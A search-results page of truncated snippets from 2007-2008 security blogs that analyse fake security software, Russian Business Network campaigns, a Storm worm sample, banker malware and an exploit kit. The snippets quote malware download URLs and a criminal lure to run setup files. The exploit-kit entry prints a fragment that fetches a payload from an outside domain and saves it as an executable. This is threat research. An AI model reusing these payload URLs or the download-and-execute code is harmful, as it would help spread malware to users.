SEARCH RESULTS
 
Showing 1-10 of 49 records
 
Expand article

HACKED BY THE RBN!

The Article has images
2008-04-01 15:52:09 by HASH0x8b24a94 in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...executing the harmless to a VMware backed up PC setup files below, will not just strengten our relationship by having your computer contact ours, but will also help us pay for the infrastructure we use to host these, and let us continue maintaining our 99% uptime even in times of negative attitude on a large scale against our business...
 
Tags: 42jdk7dx, 42jdk7dx pinch, 42jdk7dx system, 42jdk7dx ldig0031242, 42jdk7dx inst250, 42jdk7dx bhos, 42jdk7dx win32, exe, 42jdk7dx bho
 
 
 
 
Expand article

A Diverse Portfolio of Fake Security Software

The Article has images
2007-12-07 15:16:07 by HASH0x89688e0 in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...exe content.onerateld.com/avsystemcare.com/AVSystemCare/install en.exe content.onerateld.com/winsecureav.com/WinSecureAv/install en.exe content.onerateld.com/goldenantispy.com/GoldenAntiSpy/install en.exe content.onerateld.com/menacerescue.com/MenaceRescue/install en.exe content.onerateld.com/antispywaresuite.com/AntiSpywareSuite/install...
 
Tags: domains portfolio, domains, portfolio, sample domains portfolio, fake security software, software, onerateld, content, exe
 
 
 
 
Expand article

Storm-Bot stripshow analysis

2007-12-23 22:06:00 by Russ McRee in HolisticInfoSec.org
 
...exe (modified to protect the innocent) yields a hash of 2BBA62FBC3B9AF85C3C7D64A82E1237C. Once executed it immediately copies itself as disnisa.exe to C:WINDOWS and adds a startup registry key for the same Current AV detection includes Kaspersky stripshow.exe - Email-Worm.Win32.Zhelatin.pd eTrust-Vet - Win32/Sintun.AT Microsoft -...
 
Tags: 40d9f1 connect, w32tm config syncfromflags, config, time, quick time check, w32tm config, exe, src78, dst192
 
 
 
 
Expand article

Execute in PowerShell

2007-12-02 11:27:00 by Keith Brown in Security Briefs
 
...exe -r but I didn't want to make any assumptions about what drive or directory Windows was installed in. What I wanted was something like this WINDIR%Microsoft.NETFrameworkv2.0.50727aspnet regiis.exe -r In PowerShell, an easy way to get the value of an environment variable is to use the $env namespace like so env:windir but when I put this...
 
Tags: powershell, 50727aspnet regiis, env, powershell assumes, env namespace, exe, netframeworkv2, windirmicrosoft, call operator
 
 
 
 
Expand article

RBN's Fake Account Suspended Notices

The Article has images
2008-01-15 19:07:34 by HASH0x8b4a7ec in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...exe 88.255.94.250/s2/m.exe 88.255.94.250/s2/d.exe 88.255.94.250/s2/un.php And as I've already pointed out in a previous post, 88.255.94.250 is the New Media Malware Gang . Moreover, next to m.exe and d.exe with an over 50% detection rates, 200.exe is impressively detected by one anti virus vendor only Detection rate : 1/32 (3.13 File size :...
 
Tags: media malware gang, malware gang, malware, rbn, exe, russian business network, actual operational department, fake account, network
 
 
 
 
Expand article

Malware Attack Exploiting Flash Zero Day Vulnerability

The Article has images
2008-05-27 17:33:43 by Dancho Danchev in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...Execution Vulnerability . At count18.wuqing17173.cn/click.aspx.php (58.215.87.11) the end user is receiving a look looks like a 404 error message, however, within the 404 message there's a great deal of information exposing the exploits location and participation domains, which you can see attached in the screenshot above. In between several...
 
Tags: flash, malware, macromedia flash content, flash content, sample flash file, adobe flash player, adobe, participation domains, domains
 
 
 
 
Expand article

Turning on cruise control

2008-01-18 07:26:00 by Keith Brown in Security Briefs
 
...exe and ccservice.exe. These do exactly the same thing, only one runs from the command line and the other runs in the background as a service. When you log in as an administrator and run ccnet.exe it naturally runs very smoothly. And this is where I started, with a very simple project that downloads code from one of our Subversion...
 
Tags: cruisecontrol, cruisecontrol logs, account, cruisecontrol log file, log, low-privilege account, ccnet configuration, ccnet, files
 
 
 
 
Expand article

A Localized Bankers Malware Campaign

The Article has images
2008-03-25 14:59:06 by HASH0x8b6136c in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...exe Scanners Result : 13/32 (40.62 TR/Spy.Banker.Gen; Trojan-Spy.Win32.Banker.JU File size : 3339776 bytes MD5: e00b1cd654b5b3fd5c8a1f5e71939a04 SHA1 : cc11a030e868ece65769e177616cbebfb239bee6 It's also interesting to note that this campaign's been aiming to stay beneath the radar, not just by localizing the campaign itself and distributing...
 
Tags: malware, bankers malware campaign, malware malware, malware campaigns, malicious malware, banker malware, bankers malware, malware authors, campaign
 
 
 
 
Expand article

The Random JS Malware Exploitation Kit

The Article has images
2008-01-15 20:49:56 by HASH0x8be7244 in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...exe",5,1,"mosvs8"); } catch(OBJECT id=yah8 classid=clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F> try { yah8.GetFile( bunburyymas.com/odjiffkl","c:mosvs8.exe",5,1,"mosvs8"); } catch Copies of the malware obtained mosvs8.exe -- and logically submitted to each and every anti virus vendor on behalf of VirusTotal just like every sample I ever came...
 
Tags: random, malware, random attack approach, cgi, local malware locations, cgi-bincert, cgi-binss, cgi-binoptions, cgi-binpstore